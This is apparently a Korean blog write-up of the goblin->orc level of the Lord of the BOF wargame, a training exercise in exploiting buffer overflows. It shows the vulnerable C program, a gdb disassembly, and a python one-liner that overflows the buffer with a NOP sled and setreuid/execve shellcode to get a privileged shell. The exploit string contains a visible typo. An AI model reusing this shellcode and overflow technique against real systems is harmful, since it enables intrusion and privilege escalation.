• [lob]goblin->orc
    공부/LOB 2014. 7. 30. 20:01

    #include <stdio.h>
    #include <stdlib.h>

    extern char **environ;

    main(int argc, char *argv[])
        char buffer[40];
        int i;

        if(argc < 2){
            printf("argv error\n");

        // egghunter
        for(i=0; environ[i]; i++)
            memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
            printf("stack is still your friend.\n");

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    [goblin@localhost goblin]$ ls
    core  orc  orc.c  ore  sg
    [goblin@localhost goblin]$ gdb ore
    GNU gdb 19991004
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x8048500 <main>:    push   %ebp
    0x8048501 <main+1>:    mov    %esp,%ebp
    0x8048503 <main+3>:    sub    $0x2c,%esp
    0x8048506 <main+6>:    cmpl   $0x1,0x8(%ebp)
    0x804850a <main+10>:    jg     0x8048523 <main+35>
    0x804850c <main+12>:    push   $0x8048630
    0x8048511 <main+17>:    call   0x8048410 <printf>
    0x8048516 <main+22>:    add    $0x4,%esp
    0x8048519 <main+25>:    push   $0x0
    0x804851b <main+27>:    call   0x8048420 <exit>
    0x8048520 <main+32>:    add    $0x4,%esp
    0x8048523 <main+35>:    nop   
    0x8048524 <main+36>:    movl   $0x0,0xffffffd4(%ebp)
    0x804852b <main+43>:    nop   
    0x804852c <main+44>:    lea    0x0(%esi,1),%esi
    0x8048530 <main+48>:    mov    0xffffffd4(%ebp),%eax
    0x8048533 <main+51>:    lea    0x0(,%eax,4),%edx
    0x804853a <main+58>:    mov    0x8049750,%eax
    0x804853f <main+63>:    cmpl   $0x0,(%eax,%edx,1)
    0x8048543 <main+67>:    jne    0x8048547 <main+71>
    0x8048545 <main+69>:    jmp    0x8048587 <main+135>
    0x8048547 <main+71>:    mov    0xffffffd4(%ebp),%eax
    0x804854a <main+74>:    lea    0x0(,%eax,4),%edx
    0x8048551 <main+81>:    mov    0x8049750,%eax
    0x8048556 <main+86>:    mov    (%eax,%edx,1),%edx
    0x8048559 <main+89>:    push   %edx
    0x804855a <main+90>:    call   0x80483f0 <strlen>
    0x804855f <main+95>:    add    $0x4,%esp
    0x8048562 <main+98>:    mov    %eax,%eax
    0x8048564 <main+100>:    push   %eax
    0x8048565 <main+101>:    push   $0x0
    0x8048567 <main+103>:    mov    0xffffffd4(%ebp),%eax
    0x804856a <main+106>:    lea    0x0(,%eax,4),%edx
    0x8048571 <main+113>:    mov    0x8049750,%eax
    ---Type <return> to continue, or q <return> to quit---
    0x8048576 <main+118>:    mov    (%eax,%edx,1),%edx
    0x8048579 <main+121>:    push   %edx
    0x804857a <main+122>:    call   0x8048430 <memset>
    0x804857f <main+127>:    add    $0xc,%esp
    0x8048582 <main+130>:    incl   0xffffffd4(%ebp)
    0x8048585 <main+133>:    jmp    0x8048530 <main+48>
    0x8048587 <main+135>:    mov    0xc(%ebp),%eax
    0x804858a <main+138>:    add    $0x4,%eax
    0x804858d <main+141>:    mov    (%eax),%edx
    0x804858f <main+143>:    add    $0x2f,%edx
    0x8048592 <main+146>:    cmpb   $0xbf,(%edx)
    0x8048595 <main+149>:    je     0x80485b0 <main+176>
    0x8048597 <main+151>:    push   $0x804863c
    0x804859c <main+156>:    call   0x8048410 <printf>
    0x80485a1 <main+161>:    add    $0x4,%esp
    0x80485a4 <main+164>:    push   $0x0
    0x80485a6 <main+166>:    call   0x8048420 <exit>
    0x80485ab <main+171>:    add    $0x4,%esp
    0x80485ae <main+174>:    mov    %esi,%esi
    0x80485b0 <main+176>:    mov    0xc(%ebp),%eax
    0x80485b3 <main+179>:    add    $0x4,%eax
    0x80485b6 <main+182>:    mov    (%eax),%edx
    0x80485b8 <main+184>:    push   %edx
    0x80485b9 <main+185>:    lea    0xffffffd8(%ebp),%eax
    0x80485bc <main+188>:    push   %eax
    0x80485bd <main+189>:    call   0x8048440 <strcpy>
    0x80485c2 <main+194>:    add    $0x8,%esp
    0x80485c5 <main+197>:    lea    0xffffffd8(%ebp),%eax
    0x80485c8 <main+200>:    push   %eax
    0x80485c9 <main+201>:    push   $0x8048659
    0x80485ce <main+206>:    call   0x8048410 <printf>
    0x80485d3 <main+211>:    add    $0x8,%esp
    0x80485d6 <main+214>:    leave 
    0x80485d7 <main+215>:    ret   
    0x80485d8 <main+216>:    nop   
    ---Type <return> to continue, or q <return> to quit---
    0x80485d9 <main+217>:    nop   
    0x80485da <main+218>:    nop   
    0x80485db <main+219>:    nop   
    0x80485dc <main+220>:    nop   
    0x80485dd <main+221>:    nop   
    0x80485de <main+222>:    nop   
    0x80485df <main+223>:    nop   
    End of assembler dump.

    [goblin@localhost goblin]$ ./orc `python -c'print "a"*44+"\xb4\xfa\xff\xbf"+"\x90"*20+"x68\xf9\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
    bash$ ls
    ls: .: Permission denied
    bash$ my-pass
    euid = 504

    '공부 > LOB' 카테고리의 다른 글

    [lob] wolfman -> darkelf  (0) 2014.07.30
    [lob] orc -> wolfman  (0) 2014.07.30
    [lob]goblin->orc  (0) 2014.07.30
    [lob]cobolt->goblin  (0) 2014.07.30
    [lob] greblin->cobolt  (0) 2014.07.30
    [lob] gate->gremlin  (0) 2014.07.30

    댓글 0

Designed by Tistory.